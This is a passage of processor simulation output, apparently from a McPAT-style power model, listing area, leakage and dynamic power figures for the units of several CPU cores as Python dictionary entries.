'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.4755,
'Instruction Fetch Unit/Runtime Dynamic': 0.334692,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.139584,
'L2/Runtime Dynamic': 0.0373435,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.28224,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.02999,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0661645,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0661645,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.59596,
'Load Store Unit/Runtime Dynamic': 1.42245,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.16315,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.326301,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0579026,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0599921,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.192997,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0193326,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.451598,
'Memory Management Unit/Runtime Dynamic': 0.0793248,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 20.0028,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.251621,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0127098,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0953364,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.359667,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 4.19735,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0236579,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.22127,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.135499,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0547817,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.0883609,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0446016,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.187744,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0418806,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.13895,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0255986,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00229779,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0251584,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0169936,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.050757,
'Execution Unit/Register Files/Runtime Dynamic': 0.0192914,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0589175,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.162657,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 0.99634,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 4.58393e-05,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 4.58393e-05,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 4.00752e-05,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 1.55954e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000244114,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000375868,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.000434173,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0163364,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.03913,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0400109,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0554856,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 3.30808,
'Instruction Fetch Unit/Runtime Dynamic': 0.112643,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0430097,
'L2/Runtime Dynamic': 0.0128205,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 1.92916,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.350503,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0223891,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.022389,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.03488,
'Load Store Unit/Runtime Dynamic': 0.483307,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0552077,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.110415,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0195934,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0202369,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.0646095,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0065664,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.254376,
'Memory Management Unit/Runtime Dynamic': 0.0268033,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 13.3688,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0673379,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00329109,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0269533,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.0975823,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 1.7295,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0234066,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.221073,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.132683,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0535458,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.0863674,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0435954,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.183509,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0408985,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.1329,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0250666,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00224595,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0247487,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0166102,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0498153,
'Execution Unit/Register Files/Runtime Dynamic': 0.0188561,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0579915,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.159175,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 0.98799,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 4.43237e-05,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 4.43237e-05,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 3.87605e-05,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 1.50894e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000238607,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000366015,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.000419445,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0159678,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.01569,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0389099,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
